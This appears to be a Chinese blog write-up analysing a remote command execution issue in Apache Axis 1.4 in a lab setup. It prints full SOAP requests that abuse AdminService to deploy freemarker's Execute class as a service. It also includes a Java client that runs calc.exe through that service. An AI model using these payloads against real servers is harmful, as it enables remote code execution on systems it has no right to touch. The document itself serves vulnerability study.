Axis 1.4 命令执行漏洞

一、先用Axis框架写一个Webservice 实例Demo

• 新建一个web项目，配置Web.xml的servlet

<servlet>  
        <servlet-name>AxisServlet</servlet-name>
        <servlet-class>org.apache.axis.transport.http.AxisServlet</servlet-class>
    </servlet>
    <!-- 这里是访问服务的路径 -->
    <servlet-mapping>
        <servlet-name>AxisServlet</servlet-name>
        <url-pattern>/services/*</url-pattern>
    </servlet-mapping>

• 写一个SayHello的接口，和SayHelloImpl的实现类

package com.zhutougg.axis;  
public interface SayHello {  
    public String say(String name);
}

package com.zhutougg.axis;  
public class SayHelloImpl implements SayHello{  
    public String say(String name) {
        return "Hello my friend " + name;
    }
}

• 然后在WEB-INF目录下配置server-config.wsdd，这里都是网上抄的，为了分析漏洞，enableRemoteAdmin选项需要修改为true

<?xml version="1.0" encoding="UTF-8"?>  
<deployment xmlns="http://xml.apache.org/axis/wsdd/" xmlns:java="http://xml.apache.org/axis/wsdd/providers/java">  
 <handler name="URLMapper" type="java:org.apache.axis.handlers.http.URLMapper"/>
 <handler name="LocalResponder" type="java:org.apache.axis.transport.local.LocalResponder"/>
 <handler name="Authenticate" type="java:org.apache.axis.handlers.SimpleAuthenticationHandler"/>
 <service name="AdminService" provider="java:MSG">
  <parameter name="allowedMethods" value="AdminService"/>
  <parameter name="enableRemoteAdmin" value="true"/>
  <parameter name="className" value="org.apache.axis.utils.Admin"/>
  <namespace>http://xml.apache.org/axis/wsdd/</namespace>
 </service>
 <service name="Version" provider="java:RPC">
  <parameter name="allowedMethods" value="getVersion"/>
  <parameter name="className" value="org.apache.axis.Version"/>
 </service> 
 <transport name="http">
  <requestFlow>
   <handler type="URLMapper"/>
   <handler type="java:org.apache.axis.handlers.http.HTTPAuthHandler"/>
  </requestFlow>
  <parameter name="qs:list" value="org.apache.axis.transport.http.QSListHandler"/>
  <parameter name="qs:wsdl" value="org.apache.axis.transport.http.QSWSDLHandler"/>
  <parameter name="qs.list" value="org.apache.axis.transport.http.QSListHandler"/>
  <parameter name="qs.method" value="org.apache.axis.transport.http.QSMethodHandler"/>
  <parameter name="qs:method" value="org.apache.axis.transport.http.QSMethodHandler"/>
  <parameter name="qs.wsdl" value="org.apache.axis.transport.http.QSWSDLHandler"/>
 </transport>
 <transport name="local">
  <responseFlow>
   <handler type="LocalResponder"/>
  </responseFlow>
 </transport>

 <!-- 配置自己的服务  -->
 <service name="sayHello" provider="java:RPC">
       <parameter name="className" value="com.zhutougg.axis.SayHelloImpl" />
       <parameter name="allowedMethods" value="*" />
 </service>
</deployment>

• 项目截图如下
• 打开浏览器访问一下 http://10.31.12.231:8888/AxisProject/services
• 再写个客户端程序

public static void main(String[] args) throws Exception {  
        String wsdlAddress = "http:// 10.31.12.231:8888/AxisProject/services/sayHello?wsdl";
        Service service = new Service();
        Call call = (Call) service.createCall();
        call.setTargetEndpointAddress(wsdlAddress);
        String val = (String) call.invoke("say", new Object[] {"aaaaaaa"});
        System.out.println("这是webservice服务器返回的信息:/n" + val);
    }

二、WIRESHARK抓包获取HTTP请求包

POST /AxisProject/services/sayHello?wsdl HTTP/1.0  
Content-Type: text/xml; charset=utf-8  
Accept: application/soap+xml, application/dime, multipart/related, text/*  
User-Agent: Axis/1.4  
Host: 10.31.12.231:8888  
Cache-Control: no-cache  
Pragma: no-cache  
SOAPAction: ""  
Content-Length: 442

<?xml version="1.0" encoding="UTF-8"?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><soapenv:Body><say soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><arg0 xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">aaaaaaa</arg0></say></soapenv:Body></soapenv:Envelope>

• 将这一段代码复制到burpsuite中测试

三、分析AdminService的enableRemoteAdmin功能

• 打开官方手册 http://axis.apache.org/axis/java/user-guide.html
• 复制该段代码替换burpsuite中

POST /AxisProject/services/AdminService?wsdl HTTP/1.0  
Content-Type: text/xml; charset=utf-8  
Accept: application/soap+xml, application/dime, multipart/related, text/*  
User-Agent: Axis/1.4  
Host: 10.31.12.231:8888  
Cache-Control: no-cache  
Pragma: no-cache  
SOAPAction: ""  
Content-Length: 588

<?xml version="1.0" encoding="UTF-8"?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><soapenv:Body><deployment xmlns="http://xml.apache.org/axis/wsdd/"  
    xmlns:java="http://xml.apache.org/axis/wsdd/providers/java">
  <service name="MyService" provider="java:RPC">
    <parameter name="className" value="samples.userguide.example3.MyService"/>
    <parameter name="allowedMethods" value="*"/>
  </service>
</deployment></soapenv:Body></soapenv:Envelope>

• 访问 http://10.31.12.231:8888/AxisProject/services 链接，发现提示我们刚刚添加的类名找不着
• 再打开server-config.wsdd文件，发现已经添加成功

而之前的漏洞通报 https://www.gdcert.com.cn/index/news_detail/W1BZRDEYCh0cDRkcGw 中提示到使用Freemarker插件的前题下才会存在漏洞，故推测使用freemarker.template.utility.Execute. exec (List arguments)方法执行命令，参考链接 https://blog.csdn.net/weixin_33967071/article/details/89831707

而Axis自带的jar包中并不包括这个文件，所以这里需要手动将该JAR包加到项目中

• 构造了新的请求如下

POST /AxisProject/services/AdminService?wsdl HTTP/1.0  
Content-Type: text/xml; charset=utf-8  
Accept: application/soap+xml, application/dime, multipart/related, text/*  
User-Agent: Axis/1.4  
Host: 10.31.12.231:8888  
Cache-Control: no-cache  
Pragma: no-cache  
SOAPAction: ""  
Content-Length: 594

<?xml version="1.0" encoding="UTF-8"?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">  
<soapenv:Body>  
<deployment xmlns="http://xml.apache.org/axis/wsdd/"  
    xmlns:java="http://xml.apache.org/axis/wsdd/providers/java">
  <service name="freemarker" provider="java:RPC">
    <parameter name="className" value="freemarker.template.utility.Execute"/>
    <parameter name="allowedMethods" value="*"/>
  </service>
</deployment>  
</soapenv:Body></soapenv:Envelope>

• 执行命令的POC请求不会写没关系，再用JAVA代码写个测试类，然后WireShark抓包

public static void main(String[] args) throws Exception {  
        String wsdlAddress = "http://10.31.12.231:8888/AxisProject/services/freemarker?wsdl";
        Service service = new Service();
        Call call = (Call) service.createCall();
        call.setTargetEndpointAddress(wsdlAddress);
        List<String> list = new ArrayList<String>();
        list.add("calc.exe");
        String val = (String) call.invoke("exec", new Object[] {list});
        System.out.println("这是webservice服务器返回的信息:/n" + val);
    }

• 抓到包文如下图所示

POST /AxisProject/services/freemarker?wsdl HTTP/1.0
Content-Type: text/xml; charset=utf-8  
Accept: application/soap+xml, application/dime, multipart/related, text/*  
User-Agent: Axis/1.4  
Host: 10.31.12.231:8888  
Cache-Control: no-cache  
Pragma: no-cache  
SOAPAction: ""  
Content-Length: 645

<?xml version="1.0" encoding="UTF-8"?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><soapenv:Body><exec soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><arg0 href="#id0"/></exec><multiRef id="id0" soapenc:root="0" soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" soapenc:arrayType="xsd:anyType[1]" xsi:type="soapenc:Array" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"><multiRef xsi:type="soapenc:string">calc.exe</multiRef></multiRef></soapenv:Body></soapenv:Envelope>

四、最后

之前就有看到这个漏洞，感觉比较鸡肋就懒得写文章，但是看到 https://xz.aliyun.com/t/5513 这篇文章之后，觉得既然要写，就要写清楚，每一步是怎么来的。

最后我并不觉得这个是漏洞，而是Axis提供正常的功能而已。

最后的最后，这里有个二维码，希望大家扫一下